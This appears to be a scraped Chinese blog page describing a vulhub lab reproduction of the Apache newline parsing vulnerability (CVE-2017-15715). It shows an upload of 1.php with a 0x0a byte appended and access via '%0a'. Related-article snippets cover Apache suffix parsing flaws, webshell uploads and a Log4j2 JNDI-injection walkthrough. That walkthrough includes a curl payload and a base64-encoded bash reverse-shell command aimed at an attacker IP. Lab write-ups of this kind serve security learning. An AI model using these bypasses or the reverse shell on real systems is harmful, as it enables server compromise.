[vulhub]apache换⾏解析漏洞复现

已于 2023-09-07 19:45:25 修改
阅读量117 收藏
点赞数
文章标签: 网络安全
于 2023-09-07 19:43:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feigerger/article/details/132744868
版权

漏洞环境:vulhub

burpsuite抓取,并且将1.php修改为1.php.

image-20230907172956649

.的16进制数据修改为0a

image-20230907173112070

image-20230907173137255

发送数据包

访问http://you-ip:8080/1.php%0a

Fredg0n
关注
vulhub靶场】Apache 中间件漏洞复现
M372109150的博客
05-10 2519
本文主要是对apache中间件漏洞复现,包括Apache HTTPD 解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞apache_parsing_vulnerability)、Apache路径穿越漏洞(CVE-2021-41773)、Apache路径穿越漏洞(CVE-2021-42013)、Apache SSI 远程命令执行漏洞
漏洞复现Vulhub)-Apache HTTPD 解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1452
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
vulhub Apache HTTPD 多后缀解析漏洞漏洞复现
qq_48744846的博客
04-14 1758
Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件。 利用Apache httpd这个特性,就可以绕过上传文件的白名单。 该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞 环境启动后,访问http://x.x.x.x/uploadfiles/apache.php.jpeg可看到 PHP版本信息: phpinfo()被执行了,该jpeg文件被解析为 php脚本。 ..
vulhub中间件解析漏洞复现
m0_46684679的博客
12-07 1222
vulhub中间件解析漏洞复现
【Web】vulhub-httpd apache解析漏洞复现(1)
uuzeray的博客
12-30 1221
意思就是上传文件的后缀不能是php,php3,php4,php5,phtml,pht我们看一下.htaccess配置文件这段代码的作用是告诉 Apache 如何处理以.php结尾的请求,确保这些请求能够被正确地解释和执行 PHP 代码,并将结果返回给客户端。这个$我们很熟悉,在非多行模式下,会忽略在句尾的%0a。之前就利用%0a行绕过了preg_match举个例子只要传入?a=flag%0a即可这里也是一样的道理绕过过滤,写马成功访问 ,RCE。
Vulhub漏洞复现Apache解析漏洞总结
来到了学渣的博客
01-30 4174
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) Vulhub漏洞复现之Th...
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Apache多后缀解析漏洞复现
m0_65354386的博客
07-04 410
cd进入靶场 漏洞目录为vulhub/httpd/apache_parsing_vulnerability。再次浏览器访问上传的页面(IP/uploadfiles/1.php.jpg),如图所示,解析成功。由于只允许上传gif、png、jpg、jpeg后缀的文件,所以当上传php文件时就会出现错误。vulhub靶场的搭建及使用以及写过,在这里就不再重复。打开bp做好抓包抓包,将创建的恶意文件上传到靶场。后续可以通过蚁剑连接详细分析webshell状态。1、能成功搭建漏洞测试与测试工具所需的运行环境。
Apache多后缀解析漏洞复现apache_parsing_vulnerability)
爱吃仡坨的Blog
10-13 2476
apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀,apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别如果运维人员给.php后缀的文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞,
Apache解析漏洞复现(CVE-2017-15715)
weixin_57379923的博客
08-04 780
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
Web安全技术期末考查-vulhub靶场搭建及漏洞复现
weixin_52363821的博客
05-27 3164
vulhub靶场搭建及漏洞复现。搭建弱点环境,详细的漏洞验证过程,修复、防御方法。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8720
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
印刷体数字与字母图片数据集资源
06-12
资源下载链接为: https://pan.quark.cn/s/fc04644b4a11 本数据集包含印刷体数字和字母的黑白图像,涵盖数字0至9、大写字母A至Z以及小写字母a至z,共计62个类别。每个类别均包含1016张图像,所有图像统一为128×128像素的尺寸规格。图像按照类别分别存储在不同的文件夹中。该数据集可用于印刷体数字与字母识别模型的训练工作。
官方软件stm32cubemx-v6-0-0 以及 所需java环境软件jre-8u441
06-12
目前在stm官方网站直接下载安装最新版的STM32cubeMX软件,运行软件后新建工程或升级软件都会直接提示无法连接服务器(“Check Connection 失败”),原因是从6.0版本开始 STM32cubeMX 不在集成JAVA环境,必须卸载已经安装的STM32cubeMX软件,然后安装stm32cubemx_v6-0-0 以及 jre-8u441,如果希望使用最新版本,直接在STM32cubeMX中带点击更新升级就好。
c# OpenCV入门基础 腐蚀、膨胀、开运算、闭运算
06-12
c# OpenCV入门基础 腐蚀、膨胀、开运算、闭运算
Remo电池机原备份.bin
最新发布
06-12
当前所发布的全部内容源于互联网搬运整理收集,仅限于小范围内传播学习和文献参考,仅供日常使用,不得用于任何商业用途,请在下载后24小时内删除,因下载本资源造成的损失,全部由使用者本人承担!如果有侵权之处请第一时间联系我们删除。敬请谅解!
软件开发劳动合同范本.doc
06-12
软件开发劳动合同范本.doc
基于Spring Boot架构的社团综合管理系统
06-12
资源下载链接为: https://pan.quark.cn/s/72147cbc453d 在当今信息化时代,高校社团管理的高效性与便捷性至关重要。基于 Spring Boot 开发的社团管理系统,致力于打造一个功能全面、操作便捷且安全可靠的平台,以满足高校社团的日常运营需求。本文将深入剖析该系统的架构设计、核心功能以及实现原理。 Spring Boot 以其轻量级和快速开发的特性,成为众多企业级应用的首选框架。本社团管理系统采用 Spring Boot 搭建,并遵循 RESTful API 设计原则,构建出一个松耦合、模块化的架构。借助 Spring Boot 的自动配置功能,项目初始化工作得以大幅简化,使开发者能够更加专注于业务逻辑的开发。 权限管理是系统安全的关键环节。本系统引入多级权限控制机制,确保不同角色(如管理员、普通成员等)能够访问其对应的系统功能。通常会借助 Spring Security 或 Apache Shiro 等安全框架,通过角色、权限与资源的映射关系,实现对用户操作的精细化管理。 为了提升用户体验和提高信息传递效率,系统集成了短信接口。在用户注册、密码找回、活动报名等关键操作环节,通过短信验证码进行验证。这需要与第三方短信服务提供商(如阿里云、腾讯云等)进行对接,利用其 SDK 实现短信的发送与接收功能。 会员管理:涵盖会员注册、登录、信息修改及权限分配等功能,方便社团成员进行自我管理。 活动管理:支持活动的创建、审批、报名以及评价等全流程管理,便于社团组织各类活动。 场地管理:实现场地的预定、审批和使用记录管理,确保资源的有效分配。 会议管理:提供会议安排、通知以及签到等功能,提升会议组织效率。 社团管理:包括社团的创建、修改、解散以及社团成员管理等功能。 消息通知:能够实时推送系统消息,保障信息的及时传达。 文件下发:支持文件的上传与下载,方便
vulhub/log4j2漏洞复现
02-09
### 复现Log4j2漏洞的过程 #### 漏洞概述 Apache Log4j 2.x <= 2.14.1 和 Log4j 2.15.0-rc1 版本存在严重的远程代码执行漏洞,编号为CVE-2021-44228[^2]。 #### 准备工作 为了复现漏洞,需先准备好Docker环境并安装vulhub漏洞靶场。具体操作如下: 确保已成功安装Docker容器服务[^1]。 从GitHub仓库克隆最新的vulhub项目到本地机器上: ```bash git clone https://github.com/vulhub/vulhub.git ``` 切至对应的漏洞案例文件夹内,在这里以`log4j2/CVE-2021-44228`为例: ```bash cd vulhub/log4j2/CVE-2021-44228/ ``` 按照官方说明文档中的指引来启动所需的Docker镜像和服务实例: ```bash docker-compose up -d ``` 此时应该能够正常访问部署好的Solr应用界面 `http://<靶场IP>:8983/solr/#/`。 #### 测试与验证 构建恶意请求字符串用于检测目标系统是否受到该漏洞的影响。可以借助工具如yakit自动生成有效的DNS回调地址,或者手动创建一个可控的域名供后续实验使用[^4]。 尝试向Solr管理接口发送包含特殊构造参数的动作指令,例如查看核心配置信息时附加`${jndi:ldap://${sys:java.version}.example.com}`形式的数据片段作为查询条件的一部分: ```bash curl 'http://<靶场IP>:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}' ``` 如果一切顺利的话,则会在指定的日志记录位置观察到来自受控服务器发出的相关网络连接活动,证明确实触发了JNDI注入行为。 #### 攻击模拟 对于更深入的研究目的而言,还可以进一步设置监听程序等待来自受害主机发起反连Shell请求。这通常涉及到运行专门设计用来配合此类场景下的Java应用程序——比如welk1n开发维护的那个开源项目`JNDI-Injection-Exploit`[^3]。 在攻击者控制的工作站上面编译打包好上述提到的应用软件包之后,就可以依据实际情况调整命令行选项来进行定制化的载荷投递动作了。下面给出了一条可能用到的实际样例语句[^5]: ```bash java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar \ -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNy4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" \ -A "<攻击机IP>" ``` 请注意替其中涉及的具体数值部分以便适应不同的测试环境需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值